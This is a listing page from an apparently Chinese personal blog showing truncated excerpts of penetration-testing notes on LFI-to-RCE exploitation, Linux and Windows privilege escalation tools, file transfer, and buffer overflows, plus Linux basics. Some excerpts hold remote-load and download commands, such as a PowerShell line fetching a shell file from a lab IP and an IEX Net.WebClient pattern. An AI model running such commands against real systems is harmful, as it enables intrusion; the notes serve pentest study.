旧事手札
  • 首页
  • 归档
  • 分类
  • 标签
  • 关于

LFI漏洞利用

LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用 将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定
2021-12-12
渗透测试
#渗透测试 #漏洞利用

Linux漏洞扫描与提权

Linux漏洞扫描与提权漏洞扫描 msf 1use post/multi/recon/local_exploit_suggester windows-exploit-suggester.py 需要安装pip2 pspy 1需要先给pspy脚本执行权力才能执行 linPEAS 1git clone https://github.com/mxrmiss/PEASS-ng.git
2021-12-12
渗透测试
#渗透测试 #漏洞利用 #linux

Windows漏洞扫描与提权

windows漏洞扫描与提权漏洞扫描 使用msf 1use post/multi/recon/local_exploit_suggester 脚本 Sherlock 使用方法 12345678>初步使用本地加载脚本>Import-Module Sherlock.ps1>远程加载脚本>IEX (New-Object System.Net.Webclient).D
2021-12-12
渗透测试
#渗透测试 #漏洞利用 #windows

博客搭建

1. 准备工作 博客框架:Hexo 博客主题:Fluid, Ayer, butterfly 主机:阿里云轻量级应用服务器 配置:2核2G 60GB 图床:阿里云OSS 软件:oss-browser(阿里云OSS适配) 写作工具:Typora 图床软件:PicGo 博客备份:Github,Gitee,Onedrive 1.1 博客框架选择 我采用的是Hexo作为我的博客框架,理由是
2021-12-12
blog
#blog #hexo

渗透测试之文件传输

文件传输 首先要在本地机器上开启HTTP服务(在被传文件的同一路径下): 12python2 -m SimpleHTTPServerpython3 -m http.sever windows powershell 1PowerShell (new-object Net.WebClient).DownloadFile('http://10.10.14.5:8082/shell1.
2021-12-12
渗透测试
#渗透测试

缓冲区溢出流程

缓冲区溢出流程一、Immunity Debugger 最好以管理员的身份运行Innunity debugger 通常有两种方法可以使用 Immunity Debugger 来调试应用程序: 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻击正在运行的进程。 打开 Immunity Debugger,然后使用它File -&g
2021-12-12
渗透测试
#渗透测试 #bufferover

Linux基础操作

本笔记的友情链接 常用目录介绍 boot 存放启动文件 dev 存放设备文件 etc 存放配置文件 home 普通用户家目录,以/home/$username的方式存放 media 移动存储自动挂载目录,以 /media/$device_name的方式来存放 mnt 手动挂载目录 opt 三方软件安装目录 pr
2020-09-14
linux
#linux

linux压缩和解压缩命令大全

linux压缩和解压缩命令大全 tar命令   解包:tar zxvf FileName.tar   打包:tar czvf FileName.tar DirName gz命令   解压1:gunzip FileName.gz   解压2:gzip -d FileName.gz   压缩:gzip FileName   .tar.gz 和 .tgz   解压:tar zxvf
2020-09-14
linux
#linux
1…456

搜索

Hexo Fluid
皖ICP备2021018016号-3